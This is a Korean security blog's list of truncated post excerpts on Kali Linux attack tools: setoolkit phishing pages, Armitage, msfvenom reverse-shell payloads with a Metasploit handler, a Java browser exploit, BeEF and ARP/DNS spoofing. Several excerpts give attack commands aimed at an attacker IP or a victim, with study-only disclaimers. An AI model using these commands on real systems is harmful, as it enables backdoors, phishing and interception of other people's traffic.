Kali10

• 

  kali setoolkit을 이용한 피싱 사이트 만들기 해당 블로그는 해킹 및 보안 블로그로 공부 및 연구용으로 작성되어지고 있습니다. 아래의 내용을 기반으로 해킹 시도 및 실제 공격을 시도하여 일어나는 모든 책임은 본인(따라한자)에게 있음을 알려드리며, 글쓴이는 아무런 책임을 지지 않습니다. 꼭 공부 및 연구용으로만 사용하여 주시길 바랍니다. 감사합니다. kali를 사용하다 보면 피싱사이트를 만들거나 테스트 용으로 가짜 사이트를 만들어야 하는 경우가 있다. 이때 주로 사용하는 도구가 setoolkit 이라는 도구인데 피싱 사이트를 만드는 것 뿐아닌 스팸메일 등 사회공학 기법에서 사용하는 공격기법들이 다양하게 사용할 수 있다. setoolkit을 사용하기 위해선 먼저 msfdb와 postgresql을 실행 해야한다. sudo service postgresql.. Metasploit/Kali & Backtrack 2023. 9. 8.

• 모의해킹을 해보자! -armitage 2편 해당 블로그는 해킹 및 보안 블로그로 공부 및 연구용으로 작성되어지고 있습니다. 아래의 내용을 기반으로 해킹 시도 및 실제 공격을 시도하여 일어나는 모든 책임은 본인(따라한자)에게 있음을 알려드리며, 글쓴이는 아무런 책임을 지지 않습니다. 꼭 공부 및 연구용으로만 사용하여 주시길 바랍니다. 감사합니다. 2023.08.18 - [Metasploit/Kali & Backtrack] - 모의해킹을 해보자!-armitage편 모의해킹을 해보자!-armitage편 해당 블로그는 해킹 및 보안 블로그로 공부 및 연구용으로 작성되어지고 있습니다. 아래의 내용을 기반으로 해킹 시도 및 실제 공격을 시도하여 일어나는 모든 책임은 본인(따라한자)에게 있음 blog.z3alous.xyz 몇일 전에 위의 글을 작성하였다. 이.. Metasploit/Kali & Backtrack 2023. 8. 21.

• 

  netdiscover tutorial :) netdiscover 같은 경우에는 기본적으로 backtrack 5 나 kali 에 있는 network tool이다. netdiscover은 active / passive scanner이다. 사용방법을 한번 알아보자 . 기본적으로 netdiscover 만 입력해도 이렇게 뜨는 것을 알수있다. 좀더 구체적으로 사용하기위해 netdiscover -h 를 입력하면 도움말이나오는데 -r 옵션을 이용하여 대역대를 설정해줄수도 있다. Security Study/Network 2016. 12. 26.

• 

  Hack windows XP with armitage in kali 모든 책임은 사용자 본인에게 있습니다. 먼저 service apache2 start 를 실행해준다. 다음은 service postgresql start 명령어를 실행시킨 후 service metasploit start 를 실행해준다. 다음은 armitage를 실행시킨다. 이러한 창을 볼수있을 텐데 connect를 누르고 yes를 누르고 기다리면 음~~ 음~~~ 기다리면 이러한 창이 뜬다. tab창에서 hosts -> add hosts 를 누르면 이렇게 victim IP를 입력할 수있도록 뜬다. 등록후 OS 를 알아보자 다시 host 탭에서 nmap scan -> quick scan(os detect)를 클릭하고 yes 그럼 콘솔창에 이러한 것을 확인할수 있다. 이제 취약점을 이용하여 공격하기 위해 어떠한.. Metasploit 2016. 12. 23.

• 

  Kali Linux by pass - Hack Windows metasploit tutorial 모든 책임은 사용자 본인에게 있습니다. 먼저 service apache2 startservice postgresql startservice metasploit startmsfvenom -p windows/meterpreter/reverse_tcp LHOST=[attacker ip] LPORT=[원하는 포트] -f exe > filename.exe 그럼 /root 폴더에 exe파일이 생긴것을 확인할수 있다.그럼 다음으로는 컨트롤할 핸들러를 만들어보자. 먼저 msfconsole을 입력한다. use exploit/multi/handlerset payload windows/meterpreter/reverse_tcp [우리가 파일을 만들때 사용한 payload]set LHOST [attacker ip]set LP.. Metasploit 2016. 12. 22.

• 

  Hack windows with metasploit Java Applet JMX Remote Code Execution 모든 책임은 사용자에게 있습니다. 연구 목적으로만 사용하시기 바랍니다. 먼저 하기전에 리눅스에서 service apache2 startservice postgresql startservice metastploit start 명령어들을 실행 시켜준다. 그 후 msfconsole을 해준다. 그럼 위와같은 창이 뜰것이다. (그림은 다를 수 있다.) 그 후 우리가 해야할 일은 핸들러를 만드는 일이다.use exploit/multi/browser/java_jre17_jmxbean_2 명령어를 이용하여 핸들러를 만든다. 우리가 다음 해야 할 행동으로 show options 을 이용하여 우리가 정해줘야하는 것을 본다. 먼저 URIPATH 명령어를 이용하여 경로를 지정해준다. / 해도되고 test를 해도된다. 지정하지.. Metasploit 2016. 12. 22.

• 

  msfvenom 주의! 모든 악의적인 법적 책임은 사용자에게 있습니다. 흠... 옛날에는 msfpayload 라는 명령어를 사용하여 백도어도 만들어 보고 했다.그러나 바끼고 난 후 오랜만에 써야해서 명령어를 하니 msfpayload가 없데여,,,검색결과 msfvenom 으로 바꼈길래 다시 공부를 하였다. 이제 이를 간단히 사용해보자!먼저 리스트를 보기위해 1. msfvenom -l 이렇게 리스트가 나온다. 만약 자기가 쓰고 싶은 payload를 찾았다면 2. msfvenom -p 원하는 payload -f 확장자 > 파일이름.확장자 root 폴더에 가면 파일이 생성되어있다. 이젠 핸들러를 향해!! 1. msfconsole 2. use exploit/multi/handler 3. sey payload [payload 명].. Metasploit 2015. 12. 6.

• 

  msf 이용하기 // beEF 사용법 msfconsole 을 이용하여 많은 정보를 찾을 수 있다.앞에서 보여준 정보들 뿐아니라 이메일 주소까지 알아낼수 있다. 하지만 msf 자체는 미국에 중점이 되어 한국 정보는 많이 없다는 점이다... (악의적인 행위의 책임은 사용자 본인에게 있습니다.) 1. use auxiliary/gather/search_email_collector 2. set domain [도메인] 3. run BeEFBeEF는 Browser Exploit Framework 로써 사용자 PC의 정보 수집부터 공격까지 가능한 도구이다. 주로 xss(크로스 사이트스크립트)공격 취약점을 찾기 위해 사용이된다. 그럼 xss란 무엇일까? 이는 웹에서 사용하는 클라이언트 스크립트를 통해 특정한 행동을 일으키는 취약점을 말한다. beEF 설치!.. Metasploit 2015. 12. 6.

• 

  Arp Spoofing & DNS Spoofing Arp Spoofing 근거리 통신망에서 Arp 를 이용하여 상대방의 데이터 패킷을 중간에서 가로채는 중간자 공격을 말한다. DNS Spoofing 도메인 네임 시스템에서 전달되는 IP 주소를 변조하거나 도메인 네임 시스템의 서버를 장악하여 사용자가 의도하지 않은 주소로 접속하게 만드는 공격이다. 주의!! 악의적으로 사용하는 책임은 본인에게 있습니다.. 1. service apache2 start 라는 명령어를 사용함으로 apache2를 실행시킨다. 2. arpspoof -i [interface] -t [victim IP] [gatewayIP] 이 명령어를 이용하여 arpspoofing을 한다. 3. fragrouter -B1 명령어를 이용하여 포트포워딩을 하여 준다. 4. dnsspoof -i [int.. Metasploit 2015. 12. 6.

• Reading package lists Error Reading package lists... Done Building dependency tree Reading state information... Done Calculating upgrade... Note, selecting 'Package' for regex 'Package' Done < == error vi /etc/apt/sources.list # Regular repositories deb http://http.kali.org/kali sana main non-free contrib deb http://security.kali.org/kali-security sana/updates main contrib non-free # Source repositories deb-src http://http.. Metasploit/Kali & Backtrack 2015. 11. 16.